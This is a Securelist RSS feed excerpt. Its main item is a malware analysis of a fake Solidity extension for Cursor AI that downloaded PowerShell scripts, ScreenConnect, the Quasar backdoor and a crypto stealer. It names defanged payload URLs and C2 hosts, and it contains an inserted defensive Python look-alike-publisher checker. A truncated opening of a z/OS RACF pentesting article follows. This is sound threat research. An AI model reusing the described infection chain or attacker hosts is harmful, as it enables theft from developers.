<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
>
<channel>
<title>Securelist</title>
<atom:link href="https://securelist.com/feed/" rel="self" type="application/rss+xml" />
<link>https://securelist.com</link>
<description></description>
<lastBuildDate>Thu, 10 Jul 2025 11:04:01 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod>hourly</sy:updatePeriod>
<sy:updateFrequency>1</sy:updateFrequency>
<generator>https://wordpress.org/?v=6.8.1</generator>
<image>
<url>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-32x32.png</url>
<title>Securelist</title>
<link>https://securelist.com</link>
<width>32</width>
<height>32</height>
</image>
<item>
<title>Code highlighting with Cursor AI for $500,000</title>
<link>https://securelist.com/open-source-package-for-cursor-ai-turned-into-a-crypto-heist/116908/</link>
<comments>https://securelist.com/open-source-package-for-cursor-ai-turned-into-a-crypto-heist/116908/#respond</comments>
<dc:creator><![CDATA[Georgy Kucherin]]></dc:creator>
<pubDate>Thu, 10 Jul 2025 11:00:41 +0000</pubDate>
<category><![CDATA[GReAT research]]></category>
<category><![CDATA[Malware Technologies]]></category>
<category><![CDATA[Malware Descriptions]]></category>
<category><![CDATA[Malware]]></category>
<category><![CDATA[Backdoor]]></category>
<category><![CDATA[Cryptocurrencies]]></category>
<category><![CDATA[PowerShell]]></category>
<category><![CDATA[Trojan-stealer]]></category>
<category><![CDATA[Open source]]></category>
<category><![CDATA[Financial threats]]></category>
<category><![CDATA[Windows malware]]></category>
<guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116908</guid>
<description><![CDATA[Kaspersky GReAT experts uncover malicious extensions for Cursor AI that download the Quasar backdoor and a crypto stealer.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/10083020/solidity-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Attacks that leverage malicious open-source packages are a major and growing threat. This type of attack now seems commonplace, with <a href="https://www.kaspersky.com/blog/supply-chain-attacks-in-2024/52965/" target="_blank" rel="noopener">reports of infected packages</a> in repositories like PyPI or npm appearing almost daily. One might expect that increased scrutiny from researchers on these repositories would long ago have minimized the profits for cybercriminals trying to make a fortune from malicious packages. However, our investigation into a recent cyber incident once again confirmed that open-source packages remain an attractive way for attackers to make easy money.</p>
<h2 id="infected-out-of-nowhere">Infected out of nowhere</h2>
<p>In June 2025, a blockchain developer from Russia reached out to us after falling victim to a cyberattack. He’d had around $500,000 in crypto assets stolen from him. Surprisingly, the victim’s operating system had been installed only a few days prior. Nothing but essential and popular apps had been downloaded to the machine. The developer was well aware of the cybersecurity risks associated with crypto transactions, so he was vigilant and carefully reviewed his every step while working online. Additionally, he used free online services for malware detection to protect his system, but no commercial antivirus software.</p>
<p>The circumstances of the infection piqued our interest, and we decided to investigate the origins of the incident. After obtaining a disk image of the infected system, we began our analysis.</p>
<h2 id="syntax-highlighting-with-a-catch">Syntax highlighting with a catch</h2>
<p>As we examined the files on the disk, a file named <code>extension.js</code> caught our attention. We found it at <code>%userprofile%\.cursor\extensions\solidityai.solidity-1.0.9-universal\src\extension.js</code>. Below is a snippet of its content:</p>
<div id="attachment_116913" style="width: 1752px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1.png" class="magnificImage"><img fetchpriority="high" decoding="async" aria-describedby="caption-attachment-116913" class="size-full wp-image-116913" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1.png" alt="A request sent by the extension to the server" width="1742" height="280" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1.png 1742w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-300x48.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-1024x165.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-768x123.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-1536x247.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-740x119.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-1600x257.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-800x129.png 800w" sizes="(max-width: 1742px) 100vw, 1742px" /></a><p id="caption-attachment-116913" class="wp-caption-text">A request sent by the extension to the server</p></div>
<p>This screenshot clearly shows the code requesting and executing a PowerShell script from the web server <code>angelic[.]su</code>: a sure sign of malware.</p>
<p>It turned out that <code>extension.js</code> was a component of the Solidity Language extension for the Cursor AI IDE, which is based on Visual Studio Code and designed for AI-assisted development. The extension is available in the Open VSX registry, used by Cursor AI, and was published about two months ago. At the time of this research, the extension had been downloaded 54,000 times; the figure was likely inflated. According to the description, the extension offers numerous features to optimize work with Solidity smart contract code, specifically syntax highlighting:</p>
<div id="attachment_116914" style="width: 1370px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-116914" class="size-full wp-image-116914" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2.png" alt="The extension's description in the Open VSX registry" width="1360" height="816" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2.png 1360w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-300x180.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-1024x614.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-768x461.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-583x350.png 583w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-740x444.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-467x280.png 467w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-800x480.png 800w" sizes="(max-width: 1360px) 100vw, 1360px" /></a><p id="caption-attachment-116914" class="wp-caption-text">The extension’s description in the Open VSX registry</p></div>
<p>We analyzed the code of every version of this extension and confirmed that it was a fake: neither syntax highlighting nor any of the other claimed features were implemented in any version. The extension has nothing to do with smart contracts. All it does is download and execute malicious code from the aforementioned web server. Furthermore, we discovered that the description of the malicious plugin was copied by the attackers from the <a href="https://open-vsx.org/extension/juanblanco/solidity" target="_blank" rel="noopener">page of a legitimate extension</a>, which had 61,000 downloads.</p>
<h2 id="how-the-extension-got-on-the-computer">How the extension got on the computer</h2>
<p>So, we found that the malicious extension had 54,000 downloads, while the legitimate one had 61,000. But how did the attackers manage to lull the developer’s vigilance? Why would he download a malicious extension with fewer downloads than the original?</p>
<p>We found out that while trying to install a Solidity code syntax highlighter, the developer searched the extension registry for <code>solidity</code>. This query returned the following:</p>
<div id="attachment_116915" style="width: 912px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-116915" class="size-full wp-image-116915" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3.png" alt="Search results for "solidity": the malicious (red) and legitimate (green) extensions" width="902" height="989" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3.png 902w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3-274x300.png 274w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3-768x842.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3-319x350.png 319w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3-740x811.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3-255x280.png 255w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3-800x877.png 800w" sizes="(max-width: 902px) 100vw, 902px" /></a><p id="caption-attachment-116915" class="wp-caption-text">Search results for “solidity”: the malicious (red) and legitimate (green) extensions</p></div>
<p>In the search results, the malicious extension appeared fourth, while the legitimate one was only in eighth place. Thus, while reviewing the search results, the developer clicked the first extension in the list with a significant number of downloads – which unfortunately proved to be the malicious one.</p>
<h2 id="the-ranking-algorithm-trap">The ranking algorithm trap</h2>
<p>How did the malicious extension appear higher in search results than the legitimate one, especially considering it had fewer downloads? It turns out the Open VSX registry ranks search results by relevance, which <a href="https://github.com/eclipse/openvsx/blob/master/server/src/main/java/org/eclipse/openvsx/search/RelevanceService.java" target="_blank" rel="noopener">considers multiple factors</a>, such as the extension rating, how recently it was published or updated, the total number of downloads, and whether the extension is verified. Consequently, the ranking is determined by a combination of factors: for example, an extension with a low number of downloads can still appear near the top of search results if that metric is offset by its recency. This is exactly what happened with the malicious plugin: the fake extension’s last update date was June 15, 2025, while the legitimate one was last updated on May 30, 2025. Thus, due to the overall mix of factors, the malicious extension’s relevance surpassed that of the original, which allowed the attackers to promote the fake extension in the search results.</p>
<p>The developer, who fell into the ranking algorithm trap, didn’t get the functionality he wanted: the extension didn’t do any syntax highlighting in Solidity. The victim mistook this for a bug, which he decided to investigate later, and continued his work. Meanwhile, the extension quietly installed malware on his computer.</p>
<h2 id="from-powershell-scripts-to-remote-control">From PowerShell scripts to remote control</h2>
<p>As mentioned above, when the malicious plugin was activated, it downloaded a PowerShell script from <code>https://angelic[.]su/files/1.txt</code>.</p>
<div id="attachment_116917" style="width: 1748px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116917" class="size-full wp-image-116917" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1.png" alt="The PowerShell script contents" width="1738" height="462" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1.png 1738w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-300x80.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-1024x272.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-768x204.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-1536x408.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-1317x350.png 1317w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-740x197.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-1053x280.png 1053w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-800x213.png 800w" sizes="auto, (max-width: 1738px) 100vw, 1738px" /></a><p id="caption-attachment-116917" class="wp-caption-text">The PowerShell script contents</p></div>
<p>The script checks if the ScreenConnect remote management software is installed on the computer. If not, it downloads a second malicious PowerShell script from: <code>https://angelic[.]su/files/2.txt</code>. This new script then downloads the ScreenConnect installer to the infected computer from <code>https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest</code> and runs it. From that point on, the attackers can control the infected computer via the newly installed software, which is configured to communicate with the C2 server <code>relay.lmfao[.]su</code>.</p>
<h2 id="data-theft">Data theft</h2>
<p>Further analysis revealed that the attackers used ScreenConnect to upload three VBScripts to the compromised machine:</p>
<ul>
<li><code>a.vbs</code></li>
<li><code>b.vbs</code></li>
<li><code>m.vbs</code></li>
</ul>
<p>Each of these downloaded a PowerShell script from the text-sharing service <code>paste.ee</code>. The download URL was obfuscated, as shown in the image below:</p>
<div id="attachment_116918" style="width: 880px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116918" class="size-full wp-image-116918" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5.png" alt="The obfuscated URL for downloading the PowerShell script" width="870" height="189" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5.png 870w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5-300x65.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5-768x167.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5-740x161.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5-800x174.png 800w" sizes="auto, (max-width: 870px) 100vw, 870px" /></a><p id="caption-attachment-116918" class="wp-caption-text">The obfuscated URL for downloading the PowerShell script</p></div>
<p>The downloaded PowerShell script then retrieved an image from <code>archive[.]org</code>. A loader known as <a href="https://www.sonicwall.com/blog/vmdetector-based-loader-abuses-steganography-to-deliver-infostealers" target="_blank" rel="noopener">VMDetector</a> was then extracted from this image. VMDetector attacks <a href="https://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america" target="_blank" rel="noopener">were previously observed</a> in phishing campaigns that targeted entities in Latin America. The loader downloaded and ran the final payload from paste.ee.</p>
<p>Our analysis of the VBScripts determined that the following payloads were downloaded to the infected computer:</p>
<ul>
<li>Quasar open-source backdoor (via <code>a.vbs</code> and <code>b.vbs</code>),</li>
<li>Stealer that collected data from browsers, email clients, and crypto wallets (via <code>m.vbs</code>). Kaspersky products detect this malware as <code>HEUR:Trojan-PSW.MSIL.PureLogs.gen</code>.</li>
</ul>
<p>Both implants communicated with the C2 server <code>144.172.112[.]84</code>, which resolved to <code>relay.lmfao[.]su</code> at the time of our analysis. With these tools, the attackers successfully obtained passphrases for the developer’s wallets and then siphoned off cryptocurrency.</p>
<h2 id="new-malicious-package">New malicious package</h2>
<p>The malicious plugin didn’t last long in the extension store and was taken down on July 2, 2025. By that time, it had already been detected not only by us as we investigated the incident but also by <a href="https://secureannex.com/blog/these-vibes-are-off/" target="_blank" rel="noopener">other researchers</a>. However, the attackers continued their campaign: just one day after the removal, they published another malicious package named “solidity”, this time exactly replicating the name of the original legitimate extension. The functionality of the fake remained unchanged: the plugin downloaded a malicious PowerShell script onto the victim’s device. This time, however, the attackers inflated the number of downloads dramatically: the new extension was supposedly downloaded around two million times. Until recently, users who searched for <code>solidity</code> within the Cursor AI development environment saw the following results (the plugin has since been removed thanks to our efforts).</p>
<div id="attachment_116919" style="width: 902px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116919" class="size-full wp-image-116919" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6.png" alt="Updated search results for "solidity"" width="892" height="881" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6.png 892w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-300x296.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-768x759.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-354x350.png 354w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-740x731.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-283x280.png 283w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-800x790.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-50x50.png 50w" sizes="auto, (max-width: 892px) 100vw, 892px" /></a><p id="caption-attachment-116919" class="wp-caption-text">Updated search results for “solidity”</p></div>
<p>The updated search results showed the legitimate and malicious extensions appearing side-by-side in the search rankings, occupying the seventh and eighth positions respectively. The developer names look identical at first glance, but the legitimate package was uploaded by <code>juanblanco</code>, while the malicious one was uploaded by <code>juanbIanco</code>. The font used by Cursor AI makes the lowercase letter <code>l</code> and uppercase <code>I</code> appear identical.</p>
<p>Therefore, the search results displayed two seemingly identical extensions: the legitimate one with 61,000 downloads and the malicious one with two million downloads. Which one would the user choose to install? Making the right choice becomes a real challenge.</p>
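<p>The <code>l</code>/<code>I</code> swap described above is hard to spot by eye but easy to catch mechanically. The following Python example is added here and is not Securelist’s or Open VSX’s code; the publisher names come from the article, while the allowlist and the search-result records are constructed. It collapses confusable glyphs to a common skeleton and flags a listing whose publisher merely looks like a vetted one, ignoring download counts because the article shows they can be inflated:</p>

```python
"""Look-alike publisher check for IDE extension listings.

Added example, not Securelist's code. The names juanblanco / juanbIanco and
'solidity' come from the article; the allowlist and listings are constructed.
"""
import unicodedata

# Characters that render identically or near-identically in common UI fonts.
# Each entry maps a look-alike to the canonical character it is confused with.
CONFUSABLE_CHARS = {
    "I": "l",   # uppercase i -> lowercase L (the trick used against Cursor AI's font)
    "1": "l",
    "|": "l",
    "0": "o",
    "5": "s",
    "$": "s",
}
# Two-character sequences that read as a single different letter.
CONFUSABLE_PAIRS = {"rn": "m", "vv": "w"}


def skeleton(name):
    """Collapse a publisher or extension name so that confusable glyphs coincide.

    Two names with the same skeleton look the same to a human skimming search
    results, even though they are different strings to the registry.
    """
    s = unicodedata.normalize("NFKC", name)
    for pair, canonical in CONFUSABLE_PAIRS.items():
        s = s.replace(pair, canonical)
    s = "".join(CONFUSABLE_CHARS.get(ch, ch) for ch in s)
    return s.lower()


def find_lookalikes(candidate, known_names):
    """Known names visually confusable with `candidate` but not byte-identical."""
    target = skeleton(candidate)
    return sorted(n for n in known_names if n != candidate and skeleton(n) == target)


def assess_listing(listing, allowlist):
    """Check one search-result listing against vetted (publisher, name) pairs.

    Returns a list of findings; an empty list means the listing is exactly an
    allowlisted extension. Download counts are deliberately not consulted.
    """
    publisher, name = listing["publisher"], listing["name"]
    findings = []
    if (publisher, name) in allowlist:
        return findings
    trusted_publishers = {p for p, _ in allowlist}
    trusted_names = {n for _, n in allowlist}
    for p in find_lookalikes(publisher, trusted_publishers):
        findings.append(
            f"publisher '{publisher}' is a look-alike of vetted publisher '{p}'")
    if name in trusted_names and publisher not in trusted_publishers:
        findings.append(
            f"extension name '{name}' matches a vetted extension, but publisher "
            f"'{publisher}' is not the vetted one")
    if not findings:
        findings.append(f"'{publisher}.{name}' is not on the allowlist")
    return findings


# Constructed allowlist: the legitimate Solidity extension named in the article.
ALLOWLIST = {("juanblanco", "solidity")}

# Constructed search results modelled on the article's screenshot: the legitimate
# extension and the typosquatted one side by side, the fake with inflated downloads.
SEARCH_RESULTS = [
    {"publisher": "juanblanco", "name": "solidity", "downloads": 61_000},
    {"publisher": "juanbIanco", "name": "solidity", "downloads": 2_000_000},
]

if __name__ == "__main__":
    for listing in SEARCH_RESULTS:
        verdict = assess_listing(listing, ALLOWLIST) or ["OK: allowlisted"]
        print(f"{listing['publisher']}.{listing['name']}: {'; '.join(verdict)}")
```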
<h2 id="similar-cyberattacks">Similar cyberattacks</h2>
<p>It’s worth noting that the Solidity extensions we uncovered are not the only malicious packages published by the attackers behind this operation. We used our <a href="https://www.kaspersky.com/open-source-feed?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______da69c993382d038a" target="_blank" rel="noopener">open-source package monitoring tool</a> to find a malicious npm package called “solsafe”. It uses the URL <code>https://staketree[.]net/1.txt</code> to download ScreenConnect. In this campaign, it’s also configured to use <code>relay.lmfao[.]su</code> for communication with the attackers.</p>
<p>We also discovered that April and May 2025 saw three malicious Visual Studio Code extensions <a href="https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/" target="_blank" rel="noopener">published</a>: solaibot, among-eth, and blankebesxstnion. The infection method used in these threats is strikingly similar to the one we described above. In fact, we found almost identical functionality in their malicious scripts.</p>
<div id="attachment_116920" style="width: 2058px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116920" class="size-full wp-image-116920" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7.png" alt="Scripts downloaded by the VS Code extension (left) vs. Solidity Language (right)" width="2048" height="673" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-300x99.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-1024x337.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-768x252.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-1536x505.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-1065x350.png 1065w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-740x243.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-852x280.png 852w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-800x263.png 800w" sizes="auto, (max-width: 2048px) 100vw, 2048px" /></a><p id="caption-attachment-116920" class="wp-caption-text">Scripts downloaded by the VS Code extension (left) vs. Solidity Language (right)</p></div>
<p>In addition, all of the listed extensions perform the same malicious actions during execution, namely:</p>
<ul>
<li>Download PowerShell scripts named <code>1.txt</code> and <code>2.txt</code>.</li>
<li>Use a VBScript with an obfuscated URL to download a payload from <code>paste.ee</code>.</li>
<li>Download an image with a payload from <code>archive.org</code>.</li>
</ul>
<p>This leads us to conclude that these infection schemes are currently being widely used to attack blockchain developers. We believe the attackers won’t stop with the Solidity extensions or the solsafe package that we found.</p>
<h2 id="takeaways">Takeaways</h2>
<p>Malicious packages continue to pose a significant threat to the crypto industry. Many projects today rely on open-source tools downloaded from package repositories. Unfortunately, packages from these repositories are often a source of malware infections. Therefore, we recommend extreme caution when downloading any tools. Always verify that the package you’re downloading isn’t a fake. If a package doesn’t work as advertised after you install it, be suspicious and check the downloaded source code.</p>
<p>In many cases, malware installed via fake open-source packages is well-known, and <a href="https://www.kaspersky.com/premium?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team___kprem____3b7590825188da5e" target="_blank" rel="noopener">modern cybersecurity solutions</a> can effectively block it. Even experienced developers must not neglect security solutions, as these can help prevent an attack in case a malicious package is installed.</p>
<h2 id="indicators-of-compromise">Indicators of compromise</h2>
<p><em>Hashes of malicious JS files</em></p>
<p><em>Network indicators</em></p>
]]></content:encoded>
<wfw:commentRss>https://securelist.com/open-source-package-for-cursor-ai-turned-into-a-crypto-heist/116908/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/10083020/solidity-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/10083020/solidity-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/10083020/solidity-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/10083020/solidity-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
</item>
<item>
<title>Approach to mainframe penetration testing on z/OS. Deep dive into RACF</title>
<link>https://securelist.com/zos-mainframe-pentesting-resource-access-control-facility/116873/</link>
<comments>https://securelist.com/zos-mainframe-pentesting-resource-access-control-facility/116873/#respond</comments>
<dc:creator><![CDATA[Denis Stepanov, Alexander Korotin]]></dc:creator>
<pubDate>Tue, 08 Jul 2025 10:00:16 +0000</pubDate>
<category><![CDATA[Research]]></category>
<category><![CDATA[Pentest]]></category>
<category><![CDATA[Security assessment]]></category>
<category><![CDATA[Offensive cybersecurity]]></category>
<category><![CDATA[Mainframes]]></category>
<category><![CDATA[z/OS]]></category>
<category><![CDATA[SQLite]]></category>
<category><![CDATA[Cybersecurity]]></category>
<guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116873</guid>
<description><![CDATA[We have explored the RACF security package in z/OS and developed a utility to interact with its database. Now, we are assessing RACF configuration security for penetration testing.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091236/zos-racf-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>In our <a href="https://securelist.com/zos-mainframe-pentesting/113427/" target="_blank" rel="noopener">previous article</a> we dissected penetration testing techniques for IBM z/OS mainframes protected by the Resource Access Control Facility (RACF) security package. In this second part of our research, we delve deeper into RACF by examining its decision-making logic, database structure, and the interactions between the various entities in this subsystem. To facilitate offline analysis of the RACF database, we have developed our own utility, racfudit, which we will use to perform possible checks and evaluate RACF configuration security. As part of this research, we also outline the relationships between RACF entities (users, resources, and data sets) to identify potential privilege escalation paths for z/OS users.</p>
<p>This material is provided solely for educational purposes and is intended to assist professionals conducting authorized penetration tests.</p>
<h2 id="racf-internal-architecture">RACF internal architecture</h2>
<h3 id="overall-role">Overall role</h3>
<div id="attachment_116875" style="width: 2643px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-scaled.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116875" class="size-full wp-image-116875" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-scaled.png" alt="z/OS access control diagram" width="2633" height="991" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-scaled.png 2633w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-300x113.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-1024x385.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-768x289.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-1536x578.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-2048x771.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-930x350.png 930w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-740x279.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-744x280.png 744w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-800x301.png 800w" sizes="auto, (max-width: 2633px) 100vw, 2633px" /></a><p id="caption-attachment-116875" class="wp-caption-text">z/OS access control diagram</p></div>
<p>To thoroughly analyze RACF, let’s recall its role and the functions of its components within the overall z/OS architecture. As illustrated in the diagram above, RACF can generally be divided into a service component and a database. Other components exist too, such as utilities for RACF administration and management, or the RACF Auditing and Reporting solution responsible for event logging and reporting. However, for a general understanding of the process, we believe these components are not strictly necessary. The RACF database stores information about z/OS users and the resources for which access control is configured. Based on this data, the RACF service component performs all necessary security checks when requested by other z/OS components and subsystems. RACF typically interacts with other subsystems through the System Authorization Facility (SAF) interface. Various z/OS components use SAF to authorize a user’s access to resources or to execute a user-requested operation. It is worth noting that while this paper focuses on the operating principle of RACF as the standard security package, other security packages like <a href="https://docs.broadcom.com/doc/ca-acf2" target="_blank" rel="noopener">ACF2</a> or <a href="https://docs.broadcom.com/doc/ca-top-secret" target="_blank" rel="noopener">Top Secret</a> can also be used in 